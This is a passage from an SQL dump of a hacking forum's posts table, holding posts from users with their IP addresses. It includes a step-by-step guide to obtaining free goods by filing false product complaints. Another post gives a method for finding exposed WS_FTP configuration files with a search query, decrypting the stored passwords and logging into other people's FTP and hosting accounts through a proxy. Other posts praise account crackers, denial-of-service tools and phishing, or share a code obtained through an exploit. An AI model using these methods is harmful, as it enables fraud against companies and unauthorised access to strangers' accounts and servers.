'0', '0', '0', '1', '1f21a8ee753c94e5fa6c366c695cb3bf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1661', '335', '1575', '25', 'RE: ESET NOD32 Antivirus & ESET Smart Security Username And Password 4 sept 2012', '0', '61', 'NXK', '1346972326', 'Moved your thread to the right section. This is nice though. Hopefully people use these and get a bit of protection for their PCs.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '5913fbd0938f04d7a9c26e19bf46ef64', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1662', '349', '1648', '33', 'RE: Everyone Read', '0', '9', 'p420', '1346972495', 'Thanks for the info. I thought you were making an announcement', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '9f053e876d7654201cb0cb3b95b1a32f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1663', '321', '1502', '34', 'RE: Full Signature Tutorial', '0', '9', 'p420', '1346972548', 'Nice tutorial. This section is full of tutorials.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', 'bc375f000db37750447a6454134ee96d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1664', '238', '1021', '56', 'RE: Ban the user above you', '0', '1', 't3h jok3r', '1346973077', 'Banned for having a Skype ID', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'a71980db6b85d22fe337f5e69e8a02a0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1665', '238', '1664', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1346973398', '[quote=\'t3h jok3r\' pid=\'1664\' dateline=\'1346973077\'] Banned for having a Skype ID [/quote] Banned for having numbers in Username.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd0ac0fd11f4a3aba722620aeec6d0d29', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1666', '349', '1662', '33', 'RE: Everyone Read', '0', '82', 'iTzIpod', '1346973648', '[quote=\'p420\' pid=\'1662\' dateline=\'1346972495\'] Thanks for the info. I thought you were making an announcement [/quote] :p Sorry for the mix up? Umm. I\'ve seen you a while on the forum. You weren\'t that quite active :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '84440ab283311a3fc8712c4c6a1db41d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1667', '321', '1663', '34', 'RE: Full Signature Tutorial', '0', '82', 'iTzIpod', '1346973724', '[quote=\'p420\' pid=\'1663\' dateline=\'1346972548\'] Nice tutorial. This section is full of tutorials. [/quote] That\'s why it is the Tutorial and Guides section?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1d21434763f2800369e045b3c3802c1f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1668', '212', '1659', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1346974675', '[quote=\'p420\' pid=\'1659\' dateline=\'1346972016\'] Unique sounds to be a group of HQ members would like to be in it. [/quote] I saw you a while on LH. But you weren\'t as active before. But you were very HQ. Hope to see you in the future. HQ as usual.', '24.212.197.164', '416597412', '1', '0', '82', '1346974699', '1', '424a93ea2e2577167e01ca66c3390bcf', '0', '1346974699'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1669', '356', '0', '16', 'Haribo - SE', '0', '112', '??????Z', '1346978831', 'So i have recently been learning to SE and from some previous ones i have tried i took it upon myself to try find companies to SE myself and i found Haribo to be successful. What you get from them depends on what you want. Step 1: goto this Link for GB users: http://www2.haribo.com/enGB/contact-information-service/contact-information-how-to-find-us.html For USA: http://www.haribo.com/planet/us/info/contact.php (Then Click Email Us) Step 2: (For GB Method) Click the drop down list and select \"Complaints\" Then fill out all your correct information, select the brand of the candy that you want and type in the name of the product you want. Then fill out the town in which you \"bought\" the candy from and what store (use a well known one, i used Morrisons which is a popular UK store) Leave \"Batch Number\" empty and also leave \"Packing Time\" and \"Packaging Size\" Empty. For the \"Best Before Date\" use something believe able like sometime in the next 2 years. You dont need to upload any pictures although it asked for some. and for the message type something like this: Hello, Firstly id like to say haribo is an amazing company, Secondly no so much good news. i recently purchased 2 bags of \"your choice of candy\" and the candy was hard and tasted wrong so i threw the candy away. I was wondering is there anything you can do about this? Thanks Step 2 for USA users: Fill out the form with your correct information and in the text box put a complaint like the example above. A day after i sent my complaint i received this email.. [spoiler]Dear Mr Kendall Thank you for your email regarding Haribo Strawbs. We are sorry that in this instance the product you purchased was found to be unsatisfactory. Unfortunately, without a sample of the product together with the relevant packaging codes we are unable to conduct a full investigation into the source of any problem but we will pass your comments in respect of the product to our marketing department. We ask you to accept our sincere apologies for the trouble and inconvenience you have been caused. [color=red]A sample of goodwill has been posted and you should receive this within the next ten days.[/color] -- Regards Michael Carr Haribo Customer Care (UK)[/spoiler] Im still waiting for mine to arrive as i only did this yesterday but i will let you all know how much candy they send me. have fun and please vouce and +rep if this helped you out. If you need any help then feel free to pm me or post here.', '92.22.251.182', '1545010102', '0', '0', '112', '1346979807', '1', 'f96cb3fb8321b721b295ab7a316a298b', '0', '1346979807'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1670', '357', '0', '3', '[Bug] Can\'t Rep?', '0', '82', 'iTzIpod', '1346979495', 'I\'m not sure if it is only affecting me. Since I\'m on Mobile. But when I try to rep someone, I get an error saying : .... I forgot. It said Remote Server or something and file not found? Not sure if bug. But I\'ll put it as that. Although I\'m pretty sure t3h jok3r knows the reason why this error occurs. Guessing because of the domain, or a plugin, or a new update... I don\'t know :p Just know that my guesses are incorrect.. xD', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fe4f43648efa922efe9451b14d827c84', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1671', '357', '1670', '3', 'RE: [Bug] Can\'t Rep?', '0', '61', 'NXK', '1346982966', 'I\'m also getting it, Don\'t worry you aren\'t the only one.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '172c9f073e3d7ff24189988245045499', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1672', '345', '1632', '63', 'RE: Userbars [Gamers]', '0', '112', '??????Z', '1346992083', 'I like the first one. nice work! :)', '92.22.248.72', '1545009224', '0', '0', '0', '0', '1', 'f0d03389999b3e803707cdb41a76c1a5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1673', '294', '1364', '16', 'RE: How to se pringles,monster,hersheys,duracell and stride', '0', '112', '??????Z', '1347013247', 'so far Duracell has worked and i complained saying the batteries ruined my ps3 controller so they gave me a number to ring for my reimbursement. i gave them by bank details and that was it. they are also sending me vouchers for batteries lol.', '92.22.248.72', '1545009224', '0', '0', '0', '0', '1', '4a9bd0c744367d2ba604095748f0c84d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1674', '357', '1670', '3', 'RE: [Bug] Can\'t Rep?', '0', '82', 'iTzIpod', '1347017911', 'Oh alright. I thought I was. Open until t3h jok3r posts.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4c2e92dacdd67be3bda3db4c9ea4e231', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1675', '357', '1670', '3', 'RE: [Bug] Can\'t Rep?', '0', '53', 'sirchamp', '1347026842', 'Yeah everyone has that error...', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '5e8744f21922f10af5511e2c0fe866b0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1676', '348', '1647', '30', 'RE: Brazzers Cracker', '0', '62', 'R?????zo?', '1347045622', 'does this really work? i\'d love you if so :D', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'c958273282564fd35292176b695fcec1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1677', '358', '0', '3', 'Misconfigure, Unable & Cloudflare downtime', '0', '1', 't3h jok3r', '1347068867', 'If you see any errors please post them below, this will help me fix the links. Also, I\'m working on the reputation problem well not really. I can\'t fix it til I get back home, I\'m on my cousins PC and I see some errors due to the new domain, please report all errors below. Thanks a bunch', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '289c2a73b7938cd4ad36a72c6d8c17e8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1678', '348', '1647', '30', 'RE: Brazzers Cracker', '0', '1', 't3h jok3r', '1347069083', 'Not really sure, give it a try under sandbox.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '63303d6a4f6effbb7020466d43aef6c7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1679', '357', '1670', '3', 'RE: [Bug] Can\'t Rep?', '0', '1', 't3h jok3r', '1347069720', 'Thanks a lot for reporting, the problem has been fixed. Test can be seen in sirchamps reputation page. If you still see the misconfiguration page then clear your cache and browser history then after a couple of hours or minutes it should be working perfectly. If you guys see any errors, please create a thread or reply to the thread below. http://l33thacking.net/showthread.php?tid=358 Thanks', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '42a07304352c2c62933ae8d7ae85f482', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1680', '358', '1677', '3', 'RE: Misconfigure, Unable & Cloudflare downtime', '0', '82', 'iTzIpod', '1347071204', 'Why was there a downtime? :/ Was down for 5 hours +', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '16587f8c761f1198ddc07755bfe40a77', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1681', '358', '1680', '3', 'RE: Misconfigure, Unable & Cloudflare downtime', '0', '1', 't3h jok3r', '1347075997', '[quote=\'iTzIpod\' pid=\'1680\' dateline=\'1347071204\'] Why was there a downtime? :/ Was down for 5 hours + [/quote] It\'s either DDoS attacks from theprofiters or our new domain.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '2068093fd66d3e10f2115e044c8b830f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1682', '326', '1520', '16', 'RE: [TUT] Free Restaurant Gift Cards.', '0', '166', '2112', '1347076505', 'Hopefully it works for you.', '108.220.98.220', '1826382556', '0', '0', '0', '0', '1', 'c334b22aeb35f1a2289727710ea739fc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1683', '346', '1642', '19', 'RE: Heads Up', '0', '9', 'p420', '1347076596', 'I can understand and i will try to post good tutorials.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '3ecbaba63d36d028ae8e479584d52bf9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1684', '212', '1668', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '9', 'p420', '1347076677', '[quote=\'iTzIpod\' pid=\'1668\' dateline=\'1346974675\'] [quote=\'p420\' pid=\'1659\' dateline=\'1346972016\'] Unique sounds to be a group of HQ members would like to be in it. [/quote] I saw you a while on LH. But you weren\'t as active before. But you were very HQ. Hope to see you in the future. HQ as usual. [/quote] Yeah, I have some ups and down with posting on LH and other sites.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '0a20fb14bc2d1854c26716f8729ed5c2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1685', '317', '1489', '61', 'RE: Unique\'s Purpose', '0', '9', 'p420', '1347076729', 'Quick Question: Why are only the LH Mods leaders? Well now NXK is Staff but before he was Mod.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '4fcc4e530f3889f2f043b439bc84233d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1686', '315', '1476', '61', 'RE: Welcome to Unique\'s HQ', '0', '9', 'p420', '1347076778', 'Hi my username is p420 and I was added to this group but someone unknown, who ever did it thanks and I will remain HQ.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '43f868fe548cdc99b612e5ca839f9319', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1687', '352', '1660', '12', 'RE: Linear Mode How to Take Down Websites Effectively + Proof', '0', '9', 'p420', '1347076992', '[quote=\'NXK\' pid=\'1660\' dateline=\'1346972166\'] Seems legit. Please add a virus scan for your DoS tool. [/quote] Dude there\'s no need for a virus scan because the download link is seized by the Feds.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', 'b34345139fb2db78811eb8223743b33a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1688', '351', '1651', '46', 'RE: Phishing Tutorial', '0', '9', 'p420', '1347077042', 'Well-written tutorial to whoever originally created this.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '97106f07f45c6af047aea2ccf060e8ed', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1689', '352', '1687', '12', 'RE: Linear Mode How to Take Down Websites Effectively + Proof', '0', '61', 'NXK', '1347078187', '[quote=\'p420\' pid=\'1687\' dateline=\'1347076992\'] [quote=\'NXK\' pid=\'1660\' dateline=\'1346972166\'] Seems legit. Please add a virus scan for your DoS tool. [/quote] Dude there\'s no need for a virus scan because the download link is seized by the Feds. [/quote] Than may I ask why there is a download link?', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'fc87d1090f1ba0aaaacd52053d340861', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1690', '348', '1647', '30', 'RE: Brazzers Cracker', '0', '61', 'NXK', '1347078301', 'This can be used to make some money if you know where to sell accounts. Thanks for this man.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '20b8e6a38419314eefcc05088ea3631a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1691', '359', '0', '29', 'Easiest Hacking Technique EVER!', '0', '1', 't3h jok3r', '1347079022', 'n this tutorial I will show you hands on how to hack ftp/cp accounts without downloading a single file. Step 1: [url=http://lmgtfy.com/?q=filetype:ini+inurl:WS_ftp]Click Here[/url] This will result in websites that host a ini file that contains secure ftp/cp logins [img]http://i291.photobucket.com/albums/ll303/shnackhag/9fad24c674f04c88e489fa5d538eb746.jpg[/img] copy the encrypted password \"pwd=\" & the login host address Step 2: [url=http://www.undermined.org/tools/security/decrypters/wsftp.php]Click here to decrypt the password[/url] Then login to host address with account name/decrypted password using fake IP/Proxy/VPN w/e.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'cf458c87e49b527b5a524072f169e7c7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1693', '311', '1483', '15', 'RE: UploadNSell Scraper', '0', '5', 'Timmy', '1347080107', '[quote=\'HoverCatz\' pid=\'1483\' dateline=\'1346656899\'] I already made one, and its not copy pasted from HF. [/quote] Oh I didn\'t know that this was in the VIP section. My bad', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '1e85d4764f954873ea77865e8a09e374', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1694', '360', '0', '58', 'What are the official groups?', '0', '5', 'Timmy', '1347080163', 'I would like to know what official groups does LH have at the moment?', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '3cc3634e50fa6d6d9ed1dac6534ca537', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1703', '212', '1684', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1347123494', '[quote=\'p420\' pid=\'1684\' dateline=\'1347076677\'] [quote=\'iTzIpod\' pid=\'1668\' dateline=\'1346974675\'] [quote=\'p420\' pid=\'1659\' dateline=\'1346972016\'] Unique sounds to be a group of HQ members would like to be in it. [/quote] I saw you a while on LH. But you weren\'t as active before. But you were very HQ. Hope to see you in the future. HQ as usual. [/quote] Yeah, I have some ups and down with posting on LH and other sites. [/quote] I have that too. But since you are HQ, I have invited you to Unique. =] Welcome.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '37754798309446bbfe3635160d2e61de', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1696', '315', '1686', '61', 'RE: Welcome to Unique\'s HQ', '0', '82', 'iTzIpod', '1347104956', '[quote=\'p420\' pid=\'1686\' dateline=\'1347076778\'] Hi my username is p420 and I was added to this group but someone unknown, who ever did it thanks and I will remain HQ. [/quote] It was me. =] You\'re welcome.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '54a405b9009140b54fa1e69187414170', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1697', '317', '1685', '61', 'RE: Unique\'s Purpose', '0', '82', 'iTzIpod', '1347105064', '[quote=\'p420\' pid=\'1685\' dateline=\'1347076729\'] Quick Question: Why are only the LH Mods leaders? Well now NXK is Staff but before he was Mod. [/quote] It was just because I trusted him. I would\'ve promoted JakeUS but I don\'t think he will be active these days. He asked for a demote.. And though he is more HQ than me :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cde5f55e8ff3393c53518c01e102ece6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1698', '346', '1683', '19', 'RE: Heads Up', '0', '82', 'iTzIpod', '1347105184', '[quote=\'p420\' pid=\'1683\' dateline=\'1347076596\'] I can understand and i will try to post good tutorials. [/quote] Alright. Thanks for helping out! =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '736d5f6d3dcc3f6f77c7899a352895fa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1699', '360', '1694', '58', 'RE: What are the official groups?', '0', '166', '2112', '1347114854', '[img]http://i.imgur.com/xYeqD.png[/img]', '108.220.98.220', '1826382556', '0', '0', '0', '0', '1', '2251cecf7b56cd3474be74575e089f08', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1700', '332', '1563', '4', 'RE: Hello', '0', '172', 'MistaCode', '1347119948', '[quote=\'t3h jok3r\' pid=\'1563\' dateline=\'1346796279\'] Welcome to L33THacking Trojan/Mistacode. Since you have come from nerdchat, I have upgraded your account for free. [/quote] Thanks Dude! I can offer you free graphics if you want? Userbar, Logo ?', '171.25.204.117', '-1424372619', '0', '0', '0', '0', '1', 'fc8277edadeeaaa1f277571cf9e8d69a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1701', '332', '1700', '4', 'RE: Hello', '0', '82', 'iTzIpod', '1347120289', '[quote=\'MistaCode\' pid=\'1700\' dateline=\'1347119948\'] [quote=\'t3h jok3r\' pid=\'1563\' dateline=\'1346796279\'] Welcome to L33THacking Trojan/Mistacode. Since you have come from nerdchat, I have upgraded your account for free. [/quote] Thanks Dude! I can offer you free graphics if you want? Userbar, Logo ? [/quote] Can you add me on Skype and show me some of your examples? I bet you\'re better than me! :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a7808af22a397bffcf2b9e3a0114dfae', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1702', '361', '0', '54', 'Xbox live Code (1 Month)', '0', '172', 'MistaCode', '1347120296', 'I used Upload n Sell exploit to get these so enjoy :D [code] PQR6D-VTRBW-J4QR6-6XC7J-T8KBJ [/code] Don\'t forget to say thanks!', '171.25.204.117', '-1424372619', '0', '0', '0', '0', '1', '988bfa2e755cc55a8173b3efe5b39fec', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1704', '332', '1700', '4', 'RE: Hello', '0', '1', 't3h jok3r', '1347128728', '[quote=\'MistaCode\' pid=\'1700\' dateline=\'1347119948\'] [quote=\'t3h jok3r\' pid=\'1563\' dateline=\'1346796279\'] Welcome to L33THacking Trojan/Mistacode. Since you have come from nerdchat, I have upgraded your account for free. [/quote] Thanks Dude! I can offer you free graphics if you want? Userbar, Logo ? [/quote] That\'s awesome. I\'ll let you know if I need any GFX help.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '6af9d8c30052ab54d6c6f79d95c67dab', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1705', '362', '0', '7', 'List of TOP 10 HACKERS', '0', '1', 't3h jok3r', '1347132958', '[size=large][b]10. Eric Corely [/b][/size] [img]http://www.toptenz.net/wp-content/uploads/2010/05/Eric-corley.jpg[/img] Better known as a pseudonym from George Orwell’s book 1984, Emmanuel Goldstein, Eric Corley was a well-known figure when it came to hacking, especially in the 1980 and 90s. In 1999 he went to court for sharing DeCSS codes and a method to download it, a program that was able to decrypt 